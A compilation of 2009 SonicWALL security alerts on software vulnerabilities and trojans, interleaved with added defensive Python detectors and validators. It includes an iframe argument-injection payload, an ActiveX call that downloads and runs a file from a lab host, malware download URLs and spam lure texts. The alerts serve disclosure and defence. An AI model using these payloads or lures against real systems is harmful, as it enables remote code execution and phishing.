
IBM Installation Manager Code Execution (Oct 2, 2009)

IBM Installation Manager (IIM) is a software tool that helps to install, update, modify, and uninstall packages. Additionally, IIM helps to keep track of what has been installed, determine what is available for installation, and organize installation directories. IIM runs on Windows and Linux platforms.

IIM provides a set of installation wizards to manage packages. When IIM is installed it registers the application “IBMIM.exe” as the iim:// scheme handler. The format for the scheme is listed below:

iim://URI

The aforementioned URI will be executed in the following command:

IBMIM.exe -url "URI"

IBMIM.exe accepts many command line arguments such as -ignoreRepositoryDigest, -accessRights and so on. The following example shows a command that executes with multiple arguments:

IBMIM.exe -vm EXECUTABLE.EXE -url "www.google.com"

The above command can be invoked by the following HTML page:

<iframe src='iim://"%20-vm%20\x.x.x.xEXECUTABLE.EXE%20-url%20www.google.com"'>

There is an argument injection vulnerability in IBM Installation Manager. From the above example, we can see that a malicious executable file can be supplied as one of the IBMIM.exe arguments via the iim:// scheme. A web browser may fail to sanitize the IIM URI before passing it to the registered application. An attacker exploiting this vulnerability can remotely control the arguments passed to the IIM executable, and inject and execute malicious programs.
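The following is an added example, not IBM's or SonicWALL's code, showing why the raw URI substituted into the handler's command line becomes extra arguments, and the input validation a scheme handler (or the browser in front of it) should apply before launching it. The handler template `IBMIM.exe -url "%1"` is modelled on the page's description, and `shlex`'s POSIX splitting is only an approximation of how Windows builds argv; the legitimate repository URI is constructed, the injected one is the page's own.

```python
"""Added example (not IBM's or SonicWALL's code): argument injection through an
unvalidated scheme URI, and the validator that rejects it."""
import re
import shlex
from urllib.parse import unquote

# Assumed handler registration, modelled on the page: the browser substitutes the
# URI for %1 and hands the whole string to the process launcher.
HANDLER_TEMPLATE = 'IBMIM.exe -url "%1"'

GOOD_URI = "iim://repo.example.com/repository.config"          # constructed
BAD_URI = r'iim://"%20-vm%20\x.x.x.xEXECUTABLE.EXE%20-url%20www.google.com"'  # from the page


def handler_argv(uri: str) -> list:
    """Return the argument vector the handler would receive for this URI.
    Percent-escapes are decoded first, as the browser does before substitution.
    shlex (POSIX rules) approximates Windows argv splitting well enough to show
    the quote break-out and the injected -vm switch."""
    return shlex.split(HANDLER_TEMPLATE.replace("%1", unquote(uri)))


# Anything that can close the quoted slot or start a new switch.
_FORBIDDEN = re.compile(r'[\s"\'\x00-\x1f]')


def is_safe_handler_uri(uri: str) -> bool:
    """Accept only a single iim:// URI that cannot escape the quoted argument slot."""
    decoded = unquote(uri)
    if not decoded.lower().startswith("iim://"):
        return False
    rest = decoded[len("iim://"):]
    if not rest or rest.startswith("-"):
        return False
    return _FORBIDDEN.search(rest) is None


if __name__ == "__main__":
    print(handler_argv(GOOD_URI))   # three arguments: the URI stays one token
    print(handler_argv(BAD_URI))    # seven arguments, including an injected -vm
    print(is_safe_handler_uri(GOOD_URI), is_safe_handler_uri(BAD_URI))
```

The validator decodes before checking because a `%20` or `%22` that survives to substitution is exactly what produces the extra tokens; rejecting on the raw string alone would miss it.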

SonicWALL has released an IPS signature to detect and block generic attack attempts targeting this vulnerability. The following signature has been released:

  • 2064 IBM Installation Manager iim URI Handling Code Execution Attempt

This vulnerability has not been assigned a Common Vulnerabilities and Exposures (CVE) identifier.

Altiris Deployment Solution File Execution (Sept 23, 2009)

Symantec Altiris Deployment Solution is a set of tools that provide software deployment functions. It runs on multiple platforms such as Windows and Linux, and it can be used remotely to deploy an operating system or applications to multiple computers in a batch.

When Symantec Altiris Deployment Solution is used as a web console, an ActiveX control AeXNSPkgDLLib.dll has to be installed on the client. The associated ClassID for this control is “63716E93-033D-48B0-8A2F-8E8473FD7AC7” and its ProgID is “Altiris.AeXNSPkgDL”. It can be instantiated in a web page using the object tag or via scripting. For example,

<object id="ctrl" classid="clsid:{63716E93-033D-48B0-8A2F-8E8473FD7AC7}">

The ActiveX control has several methods which offer different functionalities. Download and DownloadAndInstall methods are among them. They have the following prototypes:

void Download(BSTR Src, BSTR Dest)

and

void DownloadAndInstall(BSTR Src, BSTR Dest, BSTR InstCmdLine, BSTR UpgdCmdLine, BSTR ProdCode)

When the method Download or DownloadAndInstall is invoked on the ActiveX object, the file referenced by Src is downloaded via HTTP and copied to the path Dest on the web client’s system. For example,

obj.DownloadAndInstall("http://172.16.8.170/file.exe", "C:\file.exe", "C:\file.exe", "", "");

Here the remote file http://172.16.8.170/file.exe will be saved as the local file “C:\file.exe”. No confirmation dialog is presented to alert the user to the procedure.

Since a malicious program can easily be downloaded onto the target without the user’s knowledge, this design flaw is considered a remote program execution vulnerability. In addition, DownloadAndInstall provides an arbitrary program execution facility through its InstCmdLine parameter. These methods can be leveraged by attackers to execute arbitrary programs on the vulnerable host.

SonicWALL has released an IPS signature to detect and block generic attack attempts targeting this vulnerability. The following signature has been released:

  • IPS:4465 Symantec Altiris Deployment Solution ActiveX File Download

This vulnerability has not been assigned a Common Vulnerabilities and Exposures (CVE) identifier.

Fake Order – Murlo.CBA Trojan (September 22, 2009)

SonicWALL UTM Research team observed a new Trojan being spammed via a fake-order spam campaign starting September 19, 2009. The e-mail has a zip archived attachment which contains the new Murlo Trojan variant.

SonicWALL has received more than 100,000 e-mail copies of this malware so far. The e-mail looks like:

Attachment: nz.zip (contains nz.exe)

Subject: Thank you for setting the order No.475456

Email Body:
————————
Dear customer!

Thank you for ordering at our online store.
Your order: Sony VAIO A1133651A, was sent at your address.
The tracking number of your postal parcel is indicated in the document attached to this letter.
Please, print out the postal label for receiving the parcel.

Internet Store.
————————

The e-mail message looks like below:

screenshot

The executable file inside the zip attachment is packed with PEPACK v1.0 and it looks like:

screenshot

The Trojan when executed performs following host level activity:

  • Connects to and downloads malicious executables from:
    • http://weragumasekasu(REMOVED)M1B0cl5ZcR8S0j5PE3nJD2CR
    • http://84.16.224(REMOVED)out/1058/32/install.exe

  • Deletes the original file and drops the following files:
    • c:\1.exe [Detected as GAV: Kryptik.AKT (Trojan)]
    • (Program Files)\AntivirusPro_2010\AntivirusPro_2010.exe [Detected as GAV: FraudPack.TUH (Trojan)]
    • (System)\braviax.exe [Detected as GAV: FraudPack.FOI (Trojan)]
  • Creates the following registry entries to ensure that the malware runs upon system startup:
    • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Antivirus Pro 2010 = “"(ProgramFiles)\AntivirusPro_2010\AntivirusPro_2010.exe" /hide”
    • HKCU\Software\Microsoft\Windows\CurrentVersion\Run\braviax = “%System%\braviax.exe”

The Trojan is also known as Trojan.Downloader.JMJA [BitDefender], Trojan-Downloader.Murlo [Ikarus], and TR/Dldr.Murlo.cba [AntiVir].

SonicWALL Gateway AntiVirus provides protection against this malware via the GAV: Murlo.CBA (Trojan) signature. [11,031,744 hits recorded starting September 19, 2009]

screenshot

Google Groups controlled Trojan (Sep 18, 2009)

SonicWALL UTM Research team observed a new Trojan that utilizes Google Groups message boards as its Command and Control (C&C) mechanism.

This is similar to the botnet reported last month that utilized Twitter, Jaiku and other microblogging sites as its C&C mechanism – Twitter botnet. However, this is the first instance of a Trojan using a newsgroup for C&C messages.

This Trojan is distributed as a DLL file that may arrive via drive-by downloads with filename mslogin.dll. It performs following activities on the victim machine:

  • It creates a file in the system directory, %System%\tmw.dat, which the Trojan uses for logging purposes.
  • It creates the following registry entries:
    • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\InformationBar
    • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IntelliForms
  • It tries to connect to https://www.google.com/accounts/Login and log on to the escape2sun Gmail account using stored credentials.
  • Upon successful login, the Trojan connects to the private Google group escape2sun and sends the following GET request:
    • www.google.com/group/escape2sun/web/page1

    This page contains encrypted commands for the Trojan to execute, which include downloading and executing other malware executables. The results of command execution on the victim machine are sent to the C&C server via an HTTP POST request.

Note that Google Groups is not responsible for this malicious behavior; it was being misused by the Trojan's author to control the infected machines. Google had suspended the account and the private group (escape2sun) at the time of publishing this alert.

This malware is also known as W32/GrupBot [McAfee], Trojan:Win32/Gruwt.A [Microsoft], and TR/Dldr.Agent.bjta.9 [AntiVir].

SonicWALL Gateway AntiVirus provides protection against this malware via GAV: Agent.BJTA (Trojan) signature.

Apple QuickTime FlashPix Buffer Overflow (Sep 18, 2009)

The QuickTime multimedia player supports a wide range of media formats. It is capable of parsing and displaying images as well as audio and video files. One of the image file formats supported by QuickTime is FlashPix.

The FlashPix format stores image data in multiple resolutions which makes for a larger file size but speeds up serving different resolutions of the image on demand. This comes particularly in handy when the image is requested by a web browser. Serving lower resolution of an image when needed decreases download time.

Space within a FlashPix file is divided into sectors with a default size of 512 bytes. There are numerous types of sectors, each of which serves its own purpose, such as Directory, DIF, and Storage types. The header of the FlashPix file is also a separate type of sector which is always 512 bytes in size.
The structure of the FlashPix header is shown below:

Offset  Size  Description
------  ----  ------------------------------------------------------------
0x0000  8     0xd0cf11e0a1b11ae1 OR 0x0e11fc0dd0cf11e0
0x0008  16    class ID
0x0018  2     minor version
0x001a  2     major version
0x001c  2     byte order
0x001e  2     size of sectors in ^2
0x0020  2     size of mini-sectors in ^2
0x0022  2     reserved
0x0024  4     reserved
0x0028  4     reserved
0x002c  4     number of SECTs in the FAT chain
0x0030  4     first SECT in the FAT Directory chain

A buffer overflow vulnerability exists in the Apple QuickTime media player. The vulnerability is due to an integer overflow during the processing of malformed FlashPix files. The vulnerable code in QuickTimeImage.qtx does not properly validate the result of a multiplication operation involving two fields taken directly from the header of the FlashPix file. The product of these field values is then used without validation to allocate a heap memory buffer. In cases where the multiplication operation results in zero or a very small value, the buffer allocated is too small to hold the data copied into it during subsequent processing.

The data copied into the said buffer is sourced from the image file, which is entirely under the attacker’s control. Exploitation of this flaw can result in injection of malicious code into the QuickTime application process and its eventual execution. Attackers can exploit this vulnerability by persuading a target user to open a malicious FlashPix image file using the vulnerable product.
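As an added example (not Apple's or SonicWALL's code), the parser below reads the 512-byte header laid out in the table above, which is the OLE2 compound-document header FlashPix is built on, and performs the validation the text says the vulnerable code omits: checking a size that is the product of two header fields for 32-bit wrap-around and for zero before it is used as an allocation length. The page does not name the two fields QuickTime multiplies; the sector size and FAT sector count used here are an assumption chosen to show the failure mode, and the sample headers are constructed rather than taken from real files.

```python
"""Added example (not Apple's or SonicWALL's code): FlashPix/OLE2 header parsing
with the overflow check a safe allocator needs."""
import struct

HEADER_SIZE = 512
SIGNATURES = (b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1", b"\x0e\x11\xfc\x0d\xd0\xcf\x11\xe0")
U32_MAX = 0xFFFFFFFF


class BadHeader(ValueError):
    """Raised for any header the parser refuses to act on."""


def parse_fpx_header(buf: bytes) -> dict:
    """Decode the fixed header fields from the table and validate them."""
    if len(buf) < HEADER_SIZE:
        raise BadHeader("header shorter than 512 bytes")
    if buf[:8] not in SIGNATURES:
        raise BadHeader("unknown signature")
    minor, major, byte_order, sector_shift, mini_shift = struct.unpack_from("<HHHHH", buf, 0x18)
    num_fat_sects, first_dir_sect = struct.unpack_from("<II", buf, 0x2c)
    if byte_order != 0xFFFE:
        raise BadHeader("unsupported byte order marker")
    # Sector size is 2**shift; shift 9 gives the 512-byte default mentioned in the text.
    if not 7 <= sector_shift <= 12 or mini_shift >= sector_shift:
        raise BadHeader("implausible sector shift")
    sector_size = 1 << sector_shift
    # Assumed allocation size: sector size times FAT sector count. Check it as a
    # 32-bit allocator would see it: it must neither wrap nor be zero.
    fat_bytes = sector_size * num_fat_sects
    if num_fat_sects == 0 or fat_bytes > U32_MAX:
        raise BadHeader("FAT size %d x %d is zero or exceeds 32 bits" % (sector_size, num_fat_sects))
    return {"major": major, "minor": minor, "sector_size": sector_size,
            "mini_sector_size": 1 << mini_shift, "num_fat_sects": num_fat_sects,
            "first_dir_sect": first_dir_sect, "fat_bytes": fat_bytes}


def make_header(sector_shift: int, num_fat_sects: int) -> bytes:
    """Constructed sample header (not from a real file) with the given fields."""
    hdr = bytearray(HEADER_SIZE)
    hdr[:8] = SIGNATURES[0]
    struct.pack_into("<HHHHH", hdr, 0x18, 0x3E, 0x3, 0xFFFE, sector_shift, 6)
    struct.pack_into("<II", hdr, 0x2c, num_fat_sects, 1)
    return bytes(hdr)


GOOD = make_header(9, 1)               # 512-byte sectors, one FAT sector
WRAPPED = make_header(9, 0x00800000)   # 512 * 0x800000 == 2**32, i.e. 0 in 32 bits


def is_accepted(buf: bytes) -> bool:
    """True when the header passes every check, False when it is rejected."""
    try:
        parse_fpx_header(buf)
        return True
    except BadHeader:
        return False


if __name__ == "__main__":
    print(parse_fpx_header(GOOD)["fat_bytes"])   # 512
    print(is_accepted(WRAPPED))                   # False
```

The `WRAPPED` header is the case the text describes: a product that a 32-bit multiplication reduces to zero, so an unchecked allocator would hand back a buffer far smaller than the data later copied into it.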

SonicWALL has released an IPS signature that detects and blocks a specific attack attempt targeting this vulnerability. The following signature addresses this issue:

  • 4418 – Apple QuickTime FlashPix File BO Attempt

This vulnerability has been assigned CVE-2009-2798 by Mitre.

MS Windows SMB Negotiate Request DoS (Sep 11, 2009)

Microsoft Windows operating systems ship with an implementation of the Server Message Block (SMB) protocol. SMB allows for sharing network devices and facilitates RPC among other functions. The service listens on TCP ports 139 and 445. SMB is a session oriented protocol requiring an initial handshake and optional authentication before a session is initiated. The session negotiation command has the code 0x72.

The following table illustrates an SMB header:

Offset  Size      Description
------  --------  ----------------------------------------------------------
0x00    BYTE[4]   \xffSMB
0x04    BYTE      Command code (0x72)
0x05    BYTE      Error class
0x06    BYTE      Reserved
0x07    WORD      Error code
0x09    BYTE      Flags
0x0A    WORD      Flags2
0x0C    WORD      Process ID High
0x0E    DWORD[2]  Signature
0x16    WORD      Unused
0x18    WORD      Tree ID
0x1A    WORD      Process ID
0x1C    WORD      User ID
0x1E    WORD      Multiplex ID

There are several different versions of the Server Message Block (SMB) protocol. The client and server negotiate which SMB dialect to use for the session during the negotiation phase. Typically, the client sends a list of requested dialects. Some of the available dialects follow:

  • PC NETWORK PROGRAM 1.0
  • LANMAN1.0
  • NT LM 0.12

SMB2, an upgraded version of the SMB protocol, was introduced with the release of Windows Vista. The client can request an SMB2 session by including the SMB2 dialect in the negotiation request.

A vulnerability exists within the SMB protocol implementation on some versions of Microsoft Windows. It is caused by an error in indexing an array when processing SMB negotiation requests containing the SMB2 dialect. The flaw manifests itself during processing of the Process ID High field. The Process ID field value in the SMB header, constrained to 16 bits, may be extended to 32 bits by using the Process ID High field. This value is used, without any bounds checking, to index an array of function pointers. The function pointer is subsequently dereferenced and the function it points to is executed.
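As an added example (not Microsoft's or SonicWALL's code), the detector below parses the 32-byte SMB header from the table above and the dialect list of a Negotiate request, and raises an alert for the combination the text describes: an SMB2 dialect offered together with a non-zero Process ID High. The dialect string `SMB 2.002` is the one a client uses to request SMB2; the messages are constructed for the test rather than captured, and the heuristic follows the page's description only, so it should be tuned against real traffic before use.

```python
"""Added example (not Microsoft's or SonicWALL's code): SMB header parsing and a
Negotiate-request check modelled on the page's description of the flaw."""
import struct

SMB_HEADER = struct.Struct("<4sBBBHBHH8sHHHHH")   # 32 bytes, little-endian, per the table
SMB_COM_NEGOTIATE = 0x72
SMB2_DIALECT = b"SMB 2.002"                        # dialect string that requests SMB2


def parse_smb_header(msg: bytes) -> dict:
    """Return the header fields of a raw SMB message (no NetBIOS session prefix)."""
    if len(msg) < SMB_HEADER.size:
        raise ValueError("message shorter than an SMB header")
    (proto, command, err_class, _reserved, err_code, flags, flags2, pid_high,
     signature, _unused, tid, pid, uid, mid) = SMB_HEADER.unpack_from(msg, 0)
    if proto != b"\xffSMB":
        raise ValueError("not an SMB1 message")
    return {"command": command, "error_class": err_class, "error_code": err_code,
            "flags": flags, "flags2": flags2, "pid_high": pid_high,
            "tid": tid, "pid": pid, "uid": uid, "mid": mid}


def negotiate_dialects(msg: bytes) -> list:
    """Dialect strings from a Negotiate request body: WordCount (1 byte), the
    parameter words, ByteCount (2 bytes), then entries of 0x02 + name + 0x00."""
    body = msg[SMB_HEADER.size:]
    if len(body) < 3:
        raise ValueError("truncated Negotiate body")
    word_count = body[0]
    byte_count = struct.unpack_from("<H", body, 1 + 2 * word_count)[0]
    data_start = 3 + 2 * word_count
    data = body[data_start:data_start + byte_count]
    return [entry[1:] for entry in data.split(b"\x00") if entry.startswith(b"\x02")]


def inspect_negotiate(msg: bytes) -> str:
    """'alert' when an SMB2 dialect is offered with a non-zero Process ID High
    (the field the text says is used unchecked as an array index), 'ok' for
    other Negotiate requests, 'ignored' for every other command."""
    hdr = parse_smb_header(msg)
    if hdr["command"] != SMB_COM_NEGOTIATE:
        return "ignored"
    if SMB2_DIALECT in negotiate_dialects(msg) and hdr["pid_high"] != 0:
        return "alert"
    return "ok"


def build_negotiate(pid_high: int, dialects) -> bytes:
    """Construct a sample Negotiate request for testing (not a captured packet)."""
    data = b"".join(b"\x02" + d + b"\x00" for d in dialects)
    header = SMB_HEADER.pack(b"\xffSMB", SMB_COM_NEGOTIATE, 0, 0, 0, 0x18, 0xC853,
                             pid_high, b"\x00" * 8, 0, 0xFFFF, 0xFEFF, 0, 0)
    return header + bytes([0]) + struct.pack("<H", len(data)) + data


NORMAL = build_negotiate(0, [b"PC NETWORK PROGRAM 1.0", b"LANMAN1.0", b"NT LM 0.12", SMB2_DIALECT])
SUSPECT = build_negotiate(0x1234, [b"NT LM 0.12", SMB2_DIALECT])

if __name__ == "__main__":
    print(inspect_negotiate(NORMAL), inspect_negotiate(SUSPECT))   # ok alert
```

On the wire these messages sit behind a 4-byte NetBIOS session header on port 445; strip that before calling `inspect_negotiate`.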

A remote unauthenticated attacker can leverage this vulnerability to terminate the Server service, which results in a kernel panic. While it is theoretically possible that this vulnerability can be exploited for code execution, it is highly unlikely, as the attacker would be required to inject malicious code beforehand and know its exact location in memory. Thus, the most likely outcome of an exploitation attempt is the shutdown of the target machine.

SonicWALL has released an IPS signature to detect and block generic attack attempts targeting this vulnerability. The following signature has been released:

  • 2032 – MS Windows SMB Negotiate Request DoS Attempt

The vulnerability has been assigned CVE-2009-3103 by Mitre. The vendor has released a security bulletin addressing this issue.

Multiple Spam Waves – Bredolab.X (Sep 11, 2009)

SonicWALL UTM Research team has observed a strong increase in Bredolab.X spam campaigns in the last two weeks. Bredolab.X was first spammed in early August 2009 via a UPS invoice spam campaign, which was covered in the SonicALERT “UPS Invoice spam – Bredolab.X Trojan”.

SonicWALL has received more than 100,000 e-mail copies from these spam campaigns so far. The e-mail messages in all of these spam campaigns have a zip archived attachment which contains the Bredolab Trojan executable. The sample e-mail format from each spam campaign is shown below:

Campaign #1 – DHL spam

Attachment: Ma8c574c3.zip (contains Ma8c574c3.exe)

Subject: DHL Tracking Number [8-digit alpha-numeric number]

Email Body:
————————
Hello!

We were not able to deliver the postal package you have sent on the 16th of June in time because the recipient’s address is not correct.
Please print out the invoice copy attached and collect the package at our office.

DHL Delivery Services.
————————

Campaign #2 – PriceGrabber spam

Attachment: M5e786c73.zip (contains M5e786c73.exe)

Subject: Shipping confirmation for order – [Random 3-5 digit number]

Email Body:
————————
Hello!

Thank you for shopping at our internet store!
We have successfully received your payment.

Your order has been shipped to your billing address.
You have ordered Sony VAIO VGC-LT39U.

You can find your tracking number in attached to the e-mail document.
Please print the label to get your package.

We hope you enjoy your order!
Pricegrabber.com
————————

Campaign #3 – UPS Spam

Attachment: Me8541779.zip (contains Me8541779.exe)

Subject: UPS Tracking Number [Random 7 digit alpha-numeric number]

Email Body:
————————
Dear customer!

Unfortunately we were not able to deliver postal package which was sent on the 14th of July in time because the addressee’s address is erroneous.
Please print out the invoice copy attached and collect the package at our department.

Your United Parcel Service of America
————————

Campaign #4 – Western Union Spam

Attachment: Me8541779.zip (contains Me8541779.exe)

Subject: Western Union transfer is available for withdrawl

Email Body:
————————
Hello.

The amount of money transfer: 6567 USD.
Money is available to withdrawl.

You may find the Control number and receiver’s details in document attached to this email.

Western Union.
Customer Service.
————————

SonicWALL has received more than 200 distinct Bredolab.X variants through these spam campaigns. The Trojan is also known as Bredolab.gen trojan [McAfee], W32/Bredolab!Generic [F-Prot] and TrojanDownloader:Win32/Bredolab.X [Microsoft].

SonicWALL Gateway AntiVirus provided proactive protection against the above spam campaigns via the GAV: Bredolab.X_3 (Trojan) signature. [19,309,161 hits recorded starting August 18, 2009] This signature proactively detected all Bredolab.X variants.

screenshot

IIS FTP Server Buffer Overflow (Sep 3, 2009)

Microsoft Internet Information Server (IIS) is a collection of Internet service packages. The FTP server service of IIS provides functionality for exchanging and manipulating files over TCP.

One of the FTP commands supported by IIS is NLST (Name List). This command is used to transfer a directory listing from the server to the FTP client. A typical NLST command looks like:

    NLST <pathname>

If the pathname is NULL, the current directory is used.

A buffer overflow vulnerability exists within the IIS FTP server service. Specifically, when an FTP user sends an NLST command with an overly long pathname, the vulnerable code copies the pathname into a fixed-size stack buffer without performing a bounds check. Successful exploitation would overwrite critical process data (such as function return addresses), resulting in code execution with the privileges of the FTP server service. An unsuccessful attack would cause the service to crash, resulting in a denial of service condition.
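As an added example (not Microsoft's or SonicWALL's code), the detector below walks a client-to-server FTP control-channel stream, splits it into CRLF-terminated commands, and reports any NLST whose pathname argument exceeds a length the server's fixed-size buffer could plausibly hold. The 256-byte threshold is an assumption, not a figure from the page, and the sample stream is constructed.

```python
"""Added example (not Microsoft's or SonicWALL's code): flag over-long NLST
pathnames in an FTP control stream."""
NLST_MAX_ARG = 256   # assumption: alert when the pathname is longer than this


def ftp_commands(stream: bytes):
    """Yield (command_number, verb, argument) for each complete CRLF-terminated
    line; a trailing partial line (still being received) is not yielded."""
    for number, line in enumerate(stream.split(b"\r\n")[:-1], start=1):
        verb, _, arg = line.partition(b" ")
        yield number, verb.upper(), arg


def find_long_nlst(stream: bytes, limit: int = NLST_MAX_ARG) -> list:
    """Return [(command_number, argument_length)] for every NLST whose
    pathname is longer than `limit` bytes."""
    return [(number, len(arg)) for number, verb, arg in ftp_commands(stream)
            if verb == b"NLST" and len(arg) > limit]


# Constructed control-channel stream: a normal session plus one oversized NLST.
SAMPLE_STREAM = (b"USER anonymous\r\n"
                 b"PASS guest@example.org\r\n"
                 b"CWD /pub\r\n"
                 b"NLST *.txt\r\n"
                 b"nlst " + b"A" * 600 + b"\r\n"
                 b"QUIT\r\n")

if __name__ == "__main__":
    print(find_long_nlst(SAMPLE_STREAM))   # [(5, 600)]
```

The verb is upper-cased before comparison because FTP commands are case-insensitive; a detector that only matches `NLST` would miss `nlst`, which the server accepts just the same.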

This vulnerability has been assigned CVE-2009-3023. It affects the following IIS versions:

  • IIS 5.0
  • IIS 5.1
  • IIS 6.0 (denial of service only)

SonicWALL has released an IPS signature to detect and block specific exploitation attempts targeting this vulnerability. The signature is listed below:

  • 2023 – NLST Command BO Attempt

New Skype Trojan – Peskyspy (August 31, 2009)

SonicWALL UTM Research team observed a new Skype Trojan that records Skype audio conversations on the victim machine, stores them in encrypted MP3 format, and relays them back to the attacker.

The Peskyspy Trojan injects a DLL file into the Skype process on the victim machine. The DLL contains function calls to intercept all audio data input and output by the Skype process. This is done before Skype encrypts the data it sends over the network.

The Trojan extracts the PCM audio data and saves it locally as encrypted MP3 files. It sends these encrypted audio files back to the attacker’s data server.

A screenshot of the Peskyspy Trojan in action is shown below:

screenshot

This Trojan is also known as Troj/Skytap-Gen [Sophos], Trojan.Skytap.A [BitDefender], and W32/Skytap.A [F-Prot].

SonicWALL Gateway AntiVirus provides protection against this malware via GAV: Peskyspy (Trojan) and GAV: Peskyspy_2 (Trojan) signatures.

OWC Remote Code Execution (Aug 27, 2009)

Microsoft Office Web Components (OWC) provide a mechanism for data analysis and visualization. OWC can be divided into two groups — visible components and data controls. The data controls provide methods for connecting to data sources and retrieving data. If the control is instantiated, it attempts to provide data binding to the server controls. If the binding fails, it may release the object.

A memory corruption vulnerability exists in Microsoft Office Web Components controls. Specifically, the vulnerability exists in the initialization and release of the control object. If loading and releasing of the vulnerable control are repeated multiple times (through script code), the object attempts to read data from corrupted heap memory; as a result, the flow of code execution may be changed. Remote attackers could exploit this vulnerability by enticing a target user to visit a maliciously crafted web page. Successful exploitation would result in code execution with the privileges of the logged-in user. This vulnerability has been assigned CVE-2009-0562.

By default the affected ActiveX controls are not installed on any Windows platform. However, they are often installed with the popular MS Office suite and some server applications. This makes for a very large base of affected users.

The ClassIDs of the affected controls are:

0002E543-0000-0000-C000-000000000046
0002E553-0000-0000-C000-000000000046
0002E55B-0000-0000-C000-000000000046

The affected controls can also be instantiated using ProgIDs:

OWC10.DataSourceControl
OWC11.DataSourceControl

SonicWALL has released an IPS signature to detect and block specific exploitation attempts targeting this vulnerability. The signature is listed below:

  • 3144 – MS Office Web Components Remote Code Execution Attempt (MS09-043)
